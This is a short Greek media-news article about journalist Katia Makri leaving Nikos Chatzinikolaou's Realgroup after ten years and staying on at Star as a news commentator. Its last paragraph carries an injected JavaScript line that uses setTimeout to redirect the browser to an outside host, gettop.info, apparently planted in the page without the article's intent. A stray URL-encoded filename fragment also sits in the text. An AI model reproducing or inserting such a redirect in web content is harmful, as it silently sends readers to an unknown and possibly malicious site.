Απώλεια για Realgroup -Έφυγε η Κάτια Μακρή, θα μείνει μόνο στο Star…

0
27

Η Κάτια Μακρή αποφάσισε να φύγει από το συγκρότημα του Νίκου Χατζηνικολάου και να ενισχύσει περαιτέρω τη συνεργασία της με το Star.

Η καθημερινή παρουσία της σε τρεις διαφορετικές δουλειές (εκπομπή στο Realnews 12-1 κάθε μεσημέρι), αρχισυνταξία στην εφημερίδα Αγορά και σχολιασμός στο δελτίο του Star, απαιτούσαν εξοντωτικούς ρυθμούς -πράγμα που δεν άντεχε, πλέον. Επέλεξε, λοιπόν, να αποσυρθεί από το Realgroup, μετά από 10 χρόνια επιτυχημένης διαδρομής.
%cf%87%ce%b1xatzin

Χθες συναντήθηκε με τον Νίκο Χατζηνικολάου και οριστικοποίησαν το επαγγελματικό διαζύγιο. Ήδη σήμερα την αντικατέστησε στο ραδιόφωνο ο Νίκος Στραβελάκης.

Χωρίς αμφιβολία η αποχώρησή της συνιστά απώλεια και για τον Realnews και για την Αγορά. Στην πορεία του χρόνου αναδείχθηκε σε ένα από τα πλέον εμβληματικά πρόσωπα του συγκροτήματος, με το ταλέντο, τις γνώσεις και την εργασιομανία της.

Το ενδιαφέρον είναι πως φεύγει αναγνωρίζοντας τις ευκαιρίες που τις έδωσε ο Νίκος Χατζηνικολάου και μιλώντας με πολύ καλά λόγια για τη συνεργασία τους.

Τώρα πια θα τη βλέπουμε σε καθημερινή βάση στο Star, σε ρόλο σχολιάστριας στο κεντρικό δελτίο ειδήσεων. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here